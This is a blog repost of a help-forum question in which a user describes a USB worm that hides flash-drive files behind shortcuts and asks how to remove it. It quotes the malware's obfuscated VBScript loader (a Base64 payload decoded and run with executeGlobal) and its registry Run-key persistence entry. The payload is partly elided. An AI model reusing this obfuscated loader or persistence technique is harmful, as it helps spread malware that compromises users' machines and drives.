Sunday, 25 August 2013

Creating unnecessary shortcuts on flash drive [duplicate]

Creating unnecessary shortcuts on flash drive [duplicate]

This question already has an answer here:
How do I deal with a compromised server? 2 answers
Recently my computer has been infected by a strange kind of virus(may be)
that hides all the files and folders of flash drive and created the
shortcuts to them instead. The shortcuts are though properly linked to the
file.
After a little study i found the file File.vbs attached to the flash drive
connected with every such infected computer with the following content.
(content below)
also there is a registry entry in the path
computer\HKEY_USERS\S-1-5-21-427534298-769945857-2295768042-1000\software\microsoft\womdpws\currentversion\run
wscript.exe //B "C:\Users\<username>\AppData\Local\Temp\File.vbs"
Taakj2005="Jw==1PA== < [this thing is repeated about 1000 times >]
Q==1IA==1DQ==1Cg==1IA==1IA==1IA==1cg==1ZQ==1YQ==1ZA==1YQ==1bA==1bA==1Zg==1cg==1bw==1bQ==1YQ==1bg==1eQ==1IA==1PQ==1IA==1Ig==1Ig==1DQ==1Cg==1ZQ==1bg==1ZA==1IA==1aQ==1Zg==1DQ==1Cg==1DQ==1Cg==1Yw==1bQ==1ZA==1cw==1aA==1ZQ==1bA==1bA==1IA==1PQ==1IA==1cg==1ZQ==1YQ==1ZA==1YQ==1bA==1bA==1Zg==1cg==1bw==1bQ==1YQ==1bg==1eQ==1DQ==1Cg==1ZQ==1bg==1ZA==1IA==1Zg==1dQ==1bg==1Yw==1dA==1aQ==1bw==1bg==1"
Taakj2005=SPLIT(Taakj2005,"1")
FOR KAKAROTTO = 0 TO UBOUND(Taakj2005) -1
SilentLOVE = SilentLOVE & Base64Decode(Taakj2005(KAKAROTTO))
NEXT
executeGlobal (SilentLOVE)
Function Base64Encode(sText)
Dim oXML, oNode
Set oXML = CreateObject("Msxml2.DOMDocument.3.0")
Set oNode = oXML.CreateElement("base64")
oNode.dataType = "bin.base64"
oNode.nodeTypedValue =Stream_StringToBinary(sText)
Base64Encode = oNode.text
Set oNode = Nothing
Set oXML = Nothing
End Function
Function Base64Decode(ByVal vCode)
Dim oXML, oNode
Set oXML = CreateObject("Msxml2.DOMDocument.3.0")
Set oNode = oXML.CreateElement("base64")
oNode.dataType = "bin.base64"
oNode.text = vCode
Base64Decode = Stream_BinaryToString(oNode.nodeTypedValue)
Set oNode = Nothing
Set oXML = Nothing
End Function
Function Stream_StringToBinary(Text)
Const adTypeText = 2
Const adTypeBinary = 1
Dim BinaryStream
Set BinaryStream = CreateObject("ADODB.Stream")
BinaryStream.Type = adTypeText
BinaryStream.CharSet = "us-ascii"
BinaryStream.Open
BinaryStream.WriteText Text
BinaryStream.Position = 0
BinaryStream.Type = adTypeBinary
BinaryStream.Position = 0
Stream_StringToBinary = BinaryStream.Read
Set BinaryStream = Nothing
End Function
Function Stream_BinaryToString(Binary)
Const adTypeText = 2
Const adTypeBinary = 1
Dim BinaryStream
Set BinaryStream = CreateObject("ADODB.Stream")
BinaryStream.Type = adTypeBinary
BinaryStream.Open
BinaryStream.Write Binary
BinaryStream.Position = 0
BinaryStream.Type = adTypeText
BinaryStream.CharSet = "us-ascii"
Stream_BinaryToString = BinaryStream.ReadText
Set BinaryStream = Nothing
End Function
How do i get rid of this??
Posted by at

No comments:

Post a Comment

Subscribe to: Post Comments (Atom)